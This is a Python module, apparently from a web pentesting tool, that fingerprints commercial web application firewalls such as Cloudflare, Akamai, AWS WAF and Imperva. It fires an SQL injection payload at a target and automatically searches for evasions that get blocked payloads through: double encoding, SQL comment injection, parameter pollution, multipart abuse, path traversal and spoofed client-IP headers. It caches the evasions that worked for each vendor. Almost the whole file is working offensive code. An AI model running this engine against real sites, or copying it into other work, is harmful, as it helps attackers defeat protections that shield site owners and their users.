"""WAF Bypass Engine for detection and evasion of web application firewalls"""

import re
import asyncio
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import quote, quote_plus

from app.core.http_models import Response
from app.core.request_handler import RequestHandler


@dataclass
class WAFInfo:
    """Information about detected WAF"""
    vendor: str
    confidence: float  # 0.0 to 1.0
    detected_from: List[str] = field(default_factory=list)  # What indicated the WAF
    blocking_patterns: List[str] = field(default_factory=list)  # Patterns that trigger blocks


@dataclass
class BypassTechnique:
    """A WAF bypass technique"""
    name: str
    description: str
    category: str  # encoding, obfuscation, protocol, header
    apply_function: str  # Name of the method to apply this technique
    effectiveness: str = "medium"  # low, medium, high


@dataclass
class BypassResult:
    """Result of a bypass attempt"""
    success: bool
    technique: BypassTechnique
    original_blocked: bool
    bypassed_blocked: bool
    response: Optional[Response] = None
    error: Optional[str] = None


class WAFBypassEngine:
    """
    Intelligent WAF detection and evasion engine.
    
    Detects WAF presence from response patterns and applies various
    bypass techniques to evade detection.
    """
    
    # WAF fingerprints - patterns in responses that indicate specific WAFs
    WAF_SIGNATURES = {
        "Cloudflare": {
            "headers": ["cf-ray", "cf-cache-status", "__cfduid"],
            "body_patterns": [
                r"cloudflare",
                r"attention required",
                r"ray id:",
                r"cloudflare-nginx",
            ],
            "status_codes": [403, 503],
        },
        "Akamai": {
            "headers": ["akamai-origin-hop", "akamai-grn"],
            "body_patterns": [
                r"akamai",
                r"reference #\d+\.\w+",
            ],
            "status_codes": [403],
        },
        "AWS WAF": {
            "headers": ["x-amzn-requestid", "x-amzn-errortype"],
            "body_patterns": [
                r"aws",
                r"request blocked",
                r"forbidden",
            ],
            "status_codes": [403],
        },
        "ModSecurity": {
            "headers": ["server"],
            "body_patterns": [
                r"mod_security",
                r"modsecurity",
                r"not acceptable",
                r"406 not acceptable",
            ],
            "status_codes": [406, 403],
        },
        "Imperva": {
            "headers": ["x-iinfo", "set-cookie"],
            "body_patterns": [
                r"imperva",
                r"incapsula",
                r"_incap_",
                r"visid_incap",
            ],
            "status_codes": [403],
        },
        "F5 BIG-IP": {
            "headers": ["x-cnection", "x-wa-info"],
            "body_patterns": [
                r"f5",
                r"bigip",
                r"big-ip",
                r"the requested url was rejected",
            ],
            "status_codes": [403],
        },
        "FortiWeb": {
            "headers": ["server"],
            "body_patterns": [
                r"fortiweb",
                r"fortigate",
                r"fortinet",
            ],
            "status_codes": [403],
        },
        "Barracuda": {
            "headers": ["server"],
            "body_patterns": [
                r"barracuda",
                r"barra_counter_session",
            ],
            "status_codes": [403],
        },
        "Sucuri": {
            "headers": ["server", "x-sucuri-id"],
            "body_patterns": [
                r"sucuri",
                r"access denied - sucuri website firewall",
                r"questions\? cloudproxy@sucuri\.net",
            ],
            "status_codes": [403],
        },
        "Wordfence": {
            "headers": ["server"],
            "body_patterns": [
                r"wordfence",
                r"generated by wordfence",
                r"your access to this site has been limited",
            ],
            "status_codes": [403, 503],
        },
    }
    
    def __init__(self, request_handler: Optional[RequestHandler] = None):
        """
        Initialize WAF bypass engine.
        
        Args:
            request_handler: Optional RequestHandler instance
        """
        self.request_handler = request_handler or RequestHandler()
        self._bypass_cache: Dict[str, List[BypassTechnique]] = {}
        self._successful_bypasses: Dict[str, Dict[str, any]] = {}  # URL -> bypass info
    
    async def detect_waf(
        self,
        url: str,
        test_payload: str = "' OR '1'='1",
        headers: Optional[Dict[str, str]] = None
    ) -> Optional[WAFInfo]:
        """
        Detect WAF presence and vendor.
        
        Args:
            url: Target URL to test
            test_payload: Payload to trigger WAF (default: SQL injection)
            headers: Optional custom headers
            
        Returns:
            WAFInfo if WAF detected, None otherwise
        """
        # Send a benign request first
        try:
            benign_response = await self.request_handler.send_request(
                method="GET",
                url=url,
                headers=headers or {},
            )
        except Exception as e:
            # If we can't even send a benign request, can't detect WAF
            return None
        
        # Send a malicious request to trigger WAF
        try:
            malicious_url = f"{url}?test={quote(test_payload)}"
            malicious_response = await self.request_handler.send_request(
                method="GET",
                url=malicious_url,
                headers=headers or {},
            )
        except Exception as e:
            # Request failed, might be blocked
            malicious_response = None
        
        # Analyze responses for WAF signatures
        detected_wafs = []
        
        for vendor, signatures in self.WAF_SIGNATURES.items():
            confidence = 0.0
            detected_from = []
            
            # Check both responses
            for response in [benign_response, malicious_response]:
                if response is None:
                    continue
                
                # Check headers
                for header_name in signatures.get("headers", []):
                    if header_name.lower() in [h.lower() for h in response.headers.keys()]:
                        confidence += 0.3
                        detected_from.append(f"header: {header_name}")
                
                # Check body patterns
                for pattern in signatures.get("body_patterns", []):
                    if re.search(pattern, response.text, re.IGNORECASE):
                        confidence += 0.4
                        detected_from.append(f"body pattern: {pattern}")
                
                # Check status codes (only for malicious request)
                if response == malicious_response:
                    if response.status_code in signatures.get("status_codes", []):
                        confidence += 0.2
                        detected_from.append(f"status code: {response.status_code}")
            
            if confidence > 0.5:  # Threshold for detection
                detected_wafs.append((vendor, confidence, detected_from))
        
        # Return the most confident detection
        if detected_wafs:
            detected_wafs.sort(key=lambda x: x[1], reverse=True)
            vendor, confidence, detected_from = detected_wafs[0]
            
            # Extract blocking patterns from malicious response
            blocking_patterns = []
            if malicious_response and malicious_response.status_code in [403, 406, 503]:
                blocking_patterns.append(test_payload)
            
            return WAFInfo(
                vendor=vendor,
                confidence=confidence,
                detected_from=detected_from,
                blocking_patterns=blocking_patterns,
            )
        
        # Check for generic WAF behavior
        if malicious_response:
            if (malicious_response.status_code in [403, 406, 503] and
                benign_response.status_code == 200):
                return WAFInfo(
                    vendor="Generic/Unknown",
                    confidence=0.6,
                    detected_from=["blocking behavior on malicious payload"],
                    blocking_patterns=[test_payload],
                )
        
        return None
    
    def get_bypass_techniques(self, waf_vendor: Optional[str] = None) -> List[BypassTechnique]:
        """
        Get applicable bypass techniques for a WAF vendor.
        
        Args:
            waf_vendor: WAF vendor name (None for all techniques)
            
        Returns:
            List of bypass techniques
        """
        # Define all bypass techniques
        all_techniques = [
            # Encoding techniques
            BypassTechnique(
                name="URL Encoding",
                description="Apply URL encoding to special characters",
                category="encoding",
                apply_function="apply_url_encoding",
                effectiveness="medium",
            ),
            BypassTechnique(
                name="Double URL Encoding",
                description="Apply URL encoding twice",
                category="encoding",
                apply_function="apply_double_url_encoding",
                effectiveness="high",
            ),
            BypassTechnique(
                name="Unicode Encoding",
                description="Use Unicode escape sequences",
                category="encoding",
                apply_function="apply_unicode_encoding",
                effectiveness="medium",
            ),
            BypassTechnique(
                name="Hex Encoding",
                description="Encode characters as hex values",
                category="encoding",
                apply_function="apply_hex_encoding",
                effectiveness="medium",
            ),
            # Obfuscation techniques
            BypassTechnique(
                name="Case Variation",
                description="Mix uppercase and lowercase characters",
                category="obfuscation",
                apply_function="apply_case_variation",
                effectiveness="low",
            ),
            BypassTechnique(
                name="Comment Injection",
                description="Insert comments to break patterns",
                category="obfuscation",
                apply_function="apply_comment_injection",
                effectiveness="high",
            ),
            BypassTechnique(
                name="Whitespace Manipulation",
                description="Add extra whitespace and tabs",
                category="obfuscation",
                apply_function="apply_whitespace_manipulation",
                effectiveness="medium",
            ),
            # Protocol techniques
            BypassTechnique(
                name="HTTP Parameter Pollution",
                description="Duplicate parameters with different values",
                category="protocol",
                apply_function="apply_hpp",
                effectiveness="high",
            ),
            BypassTechnique(
                name="Multipart Boundary Abuse",
                description="Use multipart form data with boundary manipulation",
                category="protocol",
                apply_function="apply_multipart_boundary_abuse",
                effectiveness="high",
            ),
            BypassTechnique(
                name="Charset Confusion",
                description="Use alternative character sets",
                category="protocol",
                apply_function="apply_charset_confusion",
                effectiveness="medium",
            ),
            BypassTechnique(
                name="Path Normalization",
                description="Use path traversal sequences",
                category="protocol",
                apply_function="apply_path_normalization",
                effectiveness="medium",
            ),
            # Header techniques
            BypassTechnique(
                name="Header Manipulation",
                description="Add headers to bypass IP restrictions",
                category="header",
                apply_function="apply_header_manipulation",
                effectiveness="high",
            ),
            BypassTechnique(
                name="Content-Type Confusion",
                description="Use unexpected Content-Type headers",
                category="header",
                apply_function="apply_content_type_confusion",
                effectiveness="medium",
            ),
        ]
        
        # If specific vendor, prioritize techniques known to work
        if waf_vendor:
            # Vendor-specific technique priorities
            vendor_priorities = {
                "Cloudflare": ["Double URL Encoding", "Comment Injection", "HPP"],
                "ModSecurity": ["Comment Injection", "Whitespace Manipulation", "Case Variation"],
                "AWS WAF": ["Unicode Encoding", "Charset Confusion", "Header Manipulation"],
                "Imperva": ["Multipart Boundary Abuse", "Path Normalization", "HPP"],
            }
            
            priority_names = vendor_priorities.get(waf_vendor, [])
            
            # Sort techniques by priority
            prioritized = []
            remaining = []
            
            for tech in all_techniques:
                if tech.name in priority_names:
                    prioritized.append(tech)
                else:
                    remaining.append(tech)
            
            return prioritized + remaining
        
        return all_techniques
    
    def apply_bypass(self, payload: str, technique: BypassTechnique) -> str:
        """
        Apply a bypass technique to a payload.
        
        Args:
            payload: Original payload
            technique: Bypass technique to apply
            
        Returns:
            Modified payload with bypass applied
        """
        # Get the method name from the technique
        method_name = technique.apply_function
        
        # Call the appropriate method
        if hasattr(self, method_name):
            method = getattr(self, method_name)
            return method(payload)
        
        # Fallback: return original payload
        return payload
    
    # Bypass technique implementations
    
    def apply_url_encoding(self, payload: str) -> str:
        """Apply URL encoding"""
        return quote(payload, safe='')
    
    def apply_double_url_encoding(self, payload: str) -> str:
        """Apply double URL encoding"""
        return quote(quote(payload, safe=''), safe='')
    
    def apply_unicode_encoding(self, payload: str) -> str:
        """Apply Unicode encoding"""
        return ''.join(f'\\u{ord(c):04x}' for c in payload)
    
    def apply_hex_encoding(self, payload: str) -> str:
        """Apply hex encoding"""
        return ''.join(f'\\x{ord(c):02x}' for c in payload)
    
    def apply_case_variation(self, payload: str) -> str:
        """Apply case variation"""
        result = []
        for i, c in enumerate(payload):
            if c.isalpha():
                result.append(c.upper() if i % 2 == 0 else c.lower())
            else:
                result.append(c)
        return ''.join(result)
    
    def apply_comment_injection(self, payload: str) -> str:
        """Apply comment injection (SQL-specific)"""
        # Insert comments between keywords
        keywords = ['SELECT', 'UNION', 'FROM', 'WHERE', 'AND', 'OR']
        result = payload
        for keyword in keywords:
            # Case-insensitive replacement
            pattern = re.compile(re.escape(keyword), re.IGNORECASE)
            result = pattern.sub(f'{keyword}/**//**/', result)
        return result
    
    def apply_whitespace_manipulation(self, payload: str) -> str:
        """Apply whitespace manipulation"""
        # Replace spaces with tabs and multiple spaces
        return payload.replace(' ', '\t  ')
    
    def apply_hpp(self, payload: str) -> str:
        """Apply HTTP Parameter Pollution"""
        # For HPP, we duplicate the parameter with variations
        # This returns a special format that needs URL-level handling
        return f"{payload}&test={payload}"
    
    def apply_multipart_boundary_abuse(self, payload: str) -> str:
        """Apply multipart boundary abuse"""
        # Add boundary markers that might confuse parsers
        return f"--boundary\r\nContent-Disposition: form-data; name=\"test\"\r\n\r\n{payload}\r\n--boundary--"
    
    def apply_charset_confusion(self, payload: str) -> str:
        """Apply charset confusion using UTF-7"""
        # UTF-7 encoding can bypass some filters
        # For simplicity, we'll use a marker approach
        return f"+{payload.replace('+', '+-')}-"
    
    def apply_path_normalization(self, payload: str) -> str:
        """Apply path normalization"""
        # Add path traversal sequences and normalization tricks
        return f"/./{payload}/../{payload}"
    
    def apply_header_manipulation(self, payload: str) -> str:
        """Apply header manipulation"""
        # This is a marker for request-level header injection
        # The actual implementation needs to add X-Forwarded-For, etc.
        return payload  # Payload unchanged, headers modified at request level
    
    def apply_content_type_confusion(self, payload: str) -> str:
        """Apply content-type confusion"""
        # Return payload with marker for Content-Type manipulation
        return payload  # Payload unchanged, Content-Type modified at request level
    
    async def test_bypass(
        self,
        url: str,
        payload: str,
        technique: BypassTechnique,
        headers: Optional[Dict[str, str]] = None
    ) -> BypassResult:
        """
        Test if a bypass technique works.
        
        Args:
            url: Target URL
            payload: Payload to test
            technique: Bypass technique to test
            headers: Optional custom headers
            
        Returns:
            BypassResult with test results
        """
        # Test original payload first
        try:
            original_url = f"{url}?test={quote(payload)}"
            original_response = await self.request_handler.send_request(
                method="GET",
                url=original_url,
                headers=headers or {},
            )
            original_blocked = original_response.status_code in [403, 406, 503]
        except Exception as e:
            return BypassResult(
                success=False,
                technique=technique,
                original_blocked=True,
                bypassed_blocked=True,
                error=str(e),
            )
        
        # Apply bypass technique
        bypassed_payload = self.apply_bypass(payload, technique)
        
        # Test bypassed payload
        try:
            bypassed_url = f"{url}?test={bypassed_payload}"
            bypassed_response = await self.request_handler.send_request(
                method="GET",
                url=bypassed_url,
                headers=headers or {},
            )
            bypassed_blocked = bypassed_response.status_code in [403, 406, 503]
        except Exception as e:
            return BypassResult(
                success=False,
                technique=technique,
                original_blocked=original_blocked,
                bypassed_blocked=True,
                response=None,
                error=str(e),
            )
        
        # Success if original was blocked but bypass wasn't
        success = original_blocked and not bypassed_blocked
        
        return BypassResult(
            success=success,
            technique=technique,
            original_blocked=original_blocked,
            bypassed_blocked=bypassed_blocked,
            response=bypassed_response,
        )
    
    async def find_working_bypass(
        self,
        url: str,
        payload: str,
        waf_vendor: Optional[str] = None,
        headers: Optional[Dict[str, str]] = None,
        max_attempts: int = 5,
        use_cache: bool = True
    ) -> Optional[BypassResult]:
        """
        Find a working bypass technique.
        
        Args:
            url: Target URL
            payload: Payload to bypass
            waf_vendor: Optional WAF vendor for prioritized techniques
            headers: Optional custom headers
            max_attempts: Maximum number of techniques to try
            use_cache: Whether to try cached bypasses first
            
        Returns:
            BypassResult if successful bypass found, None otherwise
        """
        # Try cached bypasses first if enabled
        if use_cache and waf_vendor:
            cached_techniques = self.get_cached_bypasses(waf_vendor)
            
            for technique in cached_techniques[:max_attempts]:
                result = await self.test_bypass(url, payload, technique, headers)
                
                if result.success:
                    # Update cache with successful bypass
                    bypassed_payload = self.apply_bypass(payload, technique)
                    self.save_successful_bypass(
                        url, waf_vendor, technique, payload, bypassed_payload
                    )
                    return result
        
        # Try all techniques
        techniques = self.get_bypass_techniques(waf_vendor)
        
        for i, technique in enumerate(techniques[:max_attempts]):
            result = await self.test_bypass(url, payload, technique, headers)
            
            if result.success:
                # Save successful bypass
                if waf_vendor:
                    bypassed_payload = self.apply_bypass(payload, technique)
                    self.save_successful_bypass(
                        url, waf_vendor, technique, payload, bypassed_payload
                    )
                return result
        
        return None
    
    def apply_multiple_bypasses(
        self,
        payload: str,
        techniques: List[BypassTechnique]
    ) -> str:
        """
        Apply multiple bypass techniques in sequence.
        
        Args:
            payload: Original payload
            techniques: List of techniques to apply
            
        Returns:
            Payload with all techniques applied
        """
        result = payload
        for technique in techniques:
            result = self.apply_bypass(result, technique)
        return result
    
    def get_bypass_headers(self, waf_vendor: Optional[str] = None) -> Dict[str, str]:
        """
        Get bypass headers for a specific WAF vendor.
        
        Args:
            waf_vendor: WAF vendor name
            
        Returns:
            Dictionary of headers to add for bypass
        """
        # Generic bypass headers
        generic_headers = {
            "X-Forwarded-For": "127.0.0.1",
            "X-Real-IP": "127.0.0.1",
            "X-Originating-IP": "127.0.0.1",
            "X-Remote-IP": "127.0.0.1",
            "X-Client-IP": "127.0.0.1",
        }
        
        # Vendor-specific headers
        vendor_headers = {
            "Cloudflare": {
                "CF-Connecting-IP": "127.0.0.1",
                "X-Forwarded-For": "127.0.0.1",
                "X-Forwarded-Host": "127.0.0.1",
                "X-Original-URL": "/",
            },
            "Akamai": {
                "X-Forwarded-For": "127.0.0.1",
                "True-Client-IP": "127.0.0.1",
                "X-Real-IP": "127.0.0.1",
            },
            "AWS WAF": {
                "X-Forwarded-For": "127.0.0.1",
                "X-Real-IP": "127.0.0.1",
                "X-Originating-IP": "127.0.0.1",
            },
            "Imperva": {
                "X-Forwarded-For": "127.0.0.1",
                "X-Real-IP": "127.0.0.1",
                "X-Client-IP": "127.0.0.1",
                "Incap-Client-IP": "127.0.0.1",
            },
        }
        
        if waf_vendor and waf_vendor in vendor_headers:
            return vendor_headers[waf_vendor]
        
        return generic_headers
    
    def save_successful_bypass(
        self,
        url: str,
        waf_vendor: str,
        technique: BypassTechnique,
        payload: str,
        bypassed_payload: str
    ):
        """
        Save a successful bypass pattern for reuse.
        
        Args:
            url: Target URL where bypass worked
            waf_vendor: WAF vendor name
            technique: The technique that worked
            payload: Original payload
            bypassed_payload: Payload after bypass applied
        """
        # Save to cache by vendor
        if waf_vendor not in self._bypass_cache:
            self._bypass_cache[waf_vendor] = []
        
        # Add technique if not already in cache
        if technique not in self._bypass_cache[waf_vendor]:
            self._bypass_cache[waf_vendor].insert(0, technique)  # Add to front for priority
        
        # Save detailed bypass info by URL
        self._successful_bypasses[url] = {
            "waf_vendor": waf_vendor,
            "technique": technique,
            "original_payload": payload,
            "bypassed_payload": bypassed_payload,
            "timestamp": asyncio.get_event_loop().time() if asyncio.get_event_loop().is_running() else 0,
        }
    
    def get_cached_bypasses(self, waf_vendor: str) -> List[BypassTechnique]:
        """
        Get cached bypass techniques for a WAF vendor.
        
        Args:
            waf_vendor: WAF vendor name
            
        Returns:
            List of techniques that have worked before
        """
        return self._bypass_cache.get(waf_vendor, [])
    
    def get_bypass_for_url(self, url: str) -> Optional[Dict[str, any]]:
        """
        Get saved bypass information for a specific URL.
        
        Args:
            url: Target URL
            
        Returns:
            Dictionary with bypass information or None
        """
        return self._successful_bypasses.get(url)
    
    def clear_bypass_cache(self, waf_vendor: Optional[str] = None):
        """
        Clear bypass cache.
        
        Args:
            waf_vendor: Optional vendor to clear (None clears all)
        """
        if waf_vendor:
            self._bypass_cache.pop(waf_vendor, None)
        else:
            self._bypass_cache.clear()
            self._successful_bypasses.clear()
    
    def export_bypass_patterns(self) -> Dict[str, any]:
        """
        Export all bypass patterns for persistence.
        
        Returns:
            Dictionary containing all bypass patterns
        """
        # Convert techniques to serializable format
        cache_export = {}
        for vendor, techniques in self._bypass_cache.items():
            cache_export[vendor] = [
                {
                    "name": t.name,
                    "description": t.description,
                    "category": t.category,
                    "apply_function": t.apply_function,
                    "effectiveness": t.effectiveness,
                }
                for t in techniques
            ]
        
        return {
            "bypass_cache": cache_export,
            "successful_bypasses": self._successful_bypasses,
        }
    
    def import_bypass_patterns(self, patterns: Dict[str, any]):
        """
        Import bypass patterns from exported data.
        
        Args:
            patterns: Dictionary containing bypass patterns
        """
        # Import cache
        cache_data = patterns.get("bypass_cache", {})
        for vendor, techniques_data in cache_data.items():
            self._bypass_cache[vendor] = [
                BypassTechnique(
                    name=t["name"],
                    description=t["description"],
                    category=t["category"],
                    apply_function=t["apply_function"],
                    effectiveness=t.get("effectiveness", "medium"),
                )
                for t in techniques_data
            ]
        
        # Import successful bypasses
        self._successful_bypasses = patterns.get("successful_bypasses", {})
